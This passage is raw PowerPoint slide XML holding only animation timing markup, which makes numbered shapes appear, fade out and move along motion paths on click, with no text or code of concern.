                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25614"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25614"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="27" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25615"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25615"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="30" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25616"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25616"/>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25603"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25603"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="37" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25606"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25606"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="40" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25607"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25607"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="43" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25608"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25608"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="46" fill="hold" nodeType="afterGroup">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5617"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25617"/>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5618"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25618"/>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5619"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25619"/>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5620"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25620"/>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5621"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25621"/>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5622"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25622"/>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5611"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="256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623"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="256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1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25623"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25623"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="78" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25646"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25646"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="81" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="82" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -4.44444E-6 4.44444E-6 L 0.2757 -0.09445 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25646"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x,ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="1380000" y="-470000"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="84" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="85" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="86" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25647"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="87" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25647"/>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5648"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="90" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25648"/>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5649"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="93" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25649"/>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650"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="96" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25650"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="97" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="98" presetID="64" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 1.11111E-6 -1.11111E-6 L -0.00781 -0.23102 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="99" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25647"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x,ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-40000" y="-1160000"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="100" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -2.5E-6 -1.48148E-6 L -0.07083 0.11528 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="101" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25649"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x,ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="102" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 1.11111E-6 0.00023 L 0.15746 0.11551 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="103" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25648"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x,ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="104" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 1.11111E-6 0.00023 L 0.36215 0.08403 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="105" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25650"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x,ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="106" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="107" fill="hold" nodeType="after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5624"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="110" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25624"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="111" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="112" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="113" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25624"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="114" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25624"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="115" fill="hold" nodeType="afterGroup">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25651"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="118" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25651"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="119" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="120" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25647"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="121" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25647"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="122" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="123" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25648"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="124" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25648"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="125" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="126" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25649"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="127" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25649"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="128" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="129" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25650"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="130" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25650"/>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p:cBhvr>
                                        <p:cTn id="132" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25646"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="133" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25646"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="134" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="135" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0 0 C 0.00955 -0.00648 0.01927 -0.01273 0.03073 -0.03078 C 0.04219 -0.04884 0.10938 -0.10972 0.06927 -0.10787 C 0.02917 -0.10601 -0.16684 -0.0324 -0.21024 -0.01898 " pathEditMode="relative" rAng="0" ptsTypes="aaaA">
                                      <p:cBhvr>
                                        <p:cTn id="136" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25651"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x,ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="137" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="138" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="2" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="139" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25651"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="140" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25651"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="141" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="142" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="143" presetID="29" presetClass="entr" presetSubtype="0" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="144" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25626"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
